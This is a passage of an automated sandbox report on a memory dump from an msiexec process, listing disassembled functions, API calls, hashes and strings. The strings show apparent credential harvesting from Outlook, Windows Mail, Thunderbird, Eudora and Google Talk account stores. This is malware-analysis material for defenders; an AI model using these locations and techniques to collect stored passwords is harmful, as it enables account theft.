                                                                            • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                            • strlen.MSVCRT ref: 004083E9
                                                                            • strlen.MSVCRT ref: 004083F8
                                                                            • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                            • String ID: 5$H$O$b$i$}$}
                                                                            • API String ID: 1832431107-3760989150
                                                                            • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                            • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                            • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                            • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                            Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 342 407f89-407f8f 338->342 343 407f83 339->343 344 407f76-407f81 call 4070e3 339->344 340->338 346 407f86-407f88 343->346 344->346 346->342
                                                                            APIs
                                                                            • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                            • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                            • strlen.MSVCRT ref: 00407F5C
                                                                            • strlen.MSVCRT ref: 00407F64
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindstrlen$FirstNext
                                                                            • String ID: ACD
                                                                            • API String ID: 379999529-620537770
                                                                            • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                            • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                            • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                            • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                            Function 00401E69 Relevance: 51.0, APIs: 18, Strings: 11, Instructions: 261stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 00401E8B
                                                                            • strlen.MSVCRT ref: 00401EA4
                                                                            • strlen.MSVCRT ref: 00401EB2
                                                                            • strlen.MSVCRT ref: 00401EF8
                                                                            • strlen.MSVCRT ref: 00401F06
                                                                            • memset.MSVCRT ref: 00401FB1
                                                                            • atoi.MSVCRT(?), ref: 00401FE0
                                                                            • memset.MSVCRT ref: 00402003
                                                                            • sprintf.MSVCRT ref: 00402030
                                                                            • memset.MSVCRT ref: 00402086
                                                                            • memset.MSVCRT ref: 0040209B
                                                                            • strlen.MSVCRT ref: 004020A1
                                                                            • strlen.MSVCRT ref: 004020AF
                                                                            • strlen.MSVCRT ref: 004020E2
                                                                            • strlen.MSVCRT ref: 004020F0
                                                                            • memset.MSVCRT ref: 00402018
                                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                            • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                            • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                            • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                            • API String ID: 3833278029-4223776976
                                                                            • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                            • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                            • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                            • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                                                                            Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                              • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                              • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                              • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                            • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                            • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                            • API String ID: 745651260-375988210
                                                                            • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                            • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                            • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                            • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                                                                            Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                            • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                            • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                            • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                            Strings
                                                                            • PStoreCreateInstance, xrefs: 00403C44
                                                                            • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                            • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                            • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                            • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                            • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                            • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                            • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                            • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                            • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                            • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                            • pstorec.dll, xrefs: 00403C30
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                            • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                            • API String ID: 1197458902-317895162
                                                                            • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                            • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                            • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                            • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                                                                            Function 00444C4A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 128COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 239 444c80-444c85 236->239 240 444c9f-444ca3 236->240 245 444d02-444d0d __setusermatherr 237->245 246 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->246 239->234 243 444c8c-444c93 239->243 240->234 241 444ca5-444ca7 240->241 244 444cad-444cb0 241->244 243->234 247 444c95-444c9d 243->247 244->237 245->246 250 444da4-444da7 246->250 251 444d6a-444d72 246->251 247->244 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 257 444d87-444d89 252->257 258 444d8b-444d9c GetStartupInfoA 252->258 253->250 254->251 254->255 255->252 256 444d7d-444d7e 255->256 256->252 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                            • String ID: k:v
                                                                            • API String ID: 3662548030-4078055367
                                                                            • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                            • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                            • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                            • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                                                                            Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 0044430B
                                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                              • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                              • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                              • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                              • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                            • memset.MSVCRT ref: 00444379
                                                                            • memset.MSVCRT ref: 00444394
                                                                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                            • strlen.MSVCRT ref: 004443DB
                                                                            • _strcmpi.MSVCRT ref: 00444401
                                                                            Strings
                                                                            • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                            • Store Root, xrefs: 004443A5
                                                                            • \Microsoft\Windows Mail, xrefs: 00444329
                                                                            • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                            • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                            • API String ID: 3203569119-2578778931
                                                                            • Opcode ID: a5a3b5de69c01cde89edf01c6ca21efea8d82838e5b9820ad63090ec74a4c9c8
                                                                            • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                            • Opcode Fuzzy Hash: a5a3b5de69c01cde89edf01c6ca21efea8d82838e5b9820ad63090ec74a4c9c8
                                                                            • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                                                                            Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                            • String ID:
                                                                            • API String ID: 2054149589-0
                                                                            • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                            • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                            • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                            • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                            Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 320 40ba74 314->320 321 40ba6f-40ba72 314->321 315->308 315->309 316 40baa0-40bab3 call 407e30 324 40bab5-40bac1 316->324 325 40bafa-40bb09 SetCursor 316->325 323 40ba75-40ba76 call 40b5e5 320->323 321->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->316 332->316 333->316 334->316
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor_mbsicmpqsort
                                                                            • String ID: /nosort$/sort
                                                                            • API String ID: 882979914-1578091866
                                                                            • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                            • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                            • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                            • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                            Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 004109F7
                                                                              • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                              • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                            • memset.MSVCRT ref: 00410A32
                                                                            • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                            • String ID:
                                                                            • API String ID: 3143880245-0
                                                                            • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                            • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                            • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                            • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                            Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 358 44b33b-44b342 359 44b344-44b34a ??3@YAXPAX@Z 358->359 360 44b34b-44b352 358->360 359->360 361 44b354-44b35a ??3@YAXPAX@Z 360->361 362 44b35b-44b362 360->362 361->362 363 44b364-44b36a ??3@YAXPAX@Z 362->363 364 44b36b-44b372 362->364 363->364 365 44b374-44b37a ??3@YAXPAX@Z 364->365 366 44b37b 364->366 365->366
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                            • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                            • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                            • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                            Function 00410DBB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 367 410dbb-410dd2 call 410d0e 370 410dd4-410ddd call 4070ae 367->370 371 410dfd-410e1b memset 367->371 378 410ddf-410de2 370->378 379 410dee-410df1 370->379 372 410e27-410e35 371->372 373 410e1d-410e20 371->373 376 410e45-410e4f call 410a9c 372->376 373->372 375 410e22-410e25 373->375 375->372 380 410e37-410e40 375->380 386 410e51-410e76 call 410d3d call 410add 376->386 387 410e7f-410e92 _mbscpy 376->387 378->371 382 410de4-410de7 378->382 385 410df8 379->385 380->376 382->371 384 410de9-410dec 382->384 384->371 384->379 388 410e95-410e97 385->388 386->387 387->388
                                                                            APIs
                                                                              • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                              • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                            • memset.MSVCRT ref: 00410E10
                                                                            • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                              • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                            • API String ID: 119022999-2036018995
                                                                            • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                            • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                            • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                            • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                            Function 004085D2 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                                                                            APIs
                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                              • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                              • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                              • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                              • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                              • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                            • memset.MSVCRT ref: 00408620
                                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                            • memset.MSVCRT ref: 00408671
                                                                            Strings
                                                                            • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                            • String ID: Software\Google\Google Talk\Accounts
                                                                            • API String ID: 3996936265-1079885057
                                                                            • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                            • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                            • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                            • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                            Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 416 40ce70-40cea1 call 4023b2 call 401e69 421 40cea3-40cea6 416->421 422 40ceb8 416->422 423 40ceb2 421->423 424 40cea8-40ceb0 421->424 425 40cebd-40cecc _strcmpi 422->425 428 40ceb4-40ceb6 423->428 424->428 426 40ced3-40cedc call 40cdda 425->426 427 40cece-40ced1 425->427 429 40cede-40cef7 call 40c3d0 call 40ba28 426->429 433 40cf3f-40cf43 426->433 427->429 428->425 437 40cef9-40cefd 429->437 438 40cf0e 429->438 439 40cf0a-40cf0c 437->439 440 40ceff-40cf08 437->440 441 40cf13-40cf30 call 40affa 438->441 439->441 440->441 443 40cf35-40cf3a call 40c580 441->443 443->433
                                                                            APIs
                                                                              • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                              • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                            • _strcmpi.MSVCRT ref: 0040CEC3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: strlen$_strcmpimemset
                                                                            • String ID: /stext
                                                                            • API String ID: 520177685-3817206916
                                                                            • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                            • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                            • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                            • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                            Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
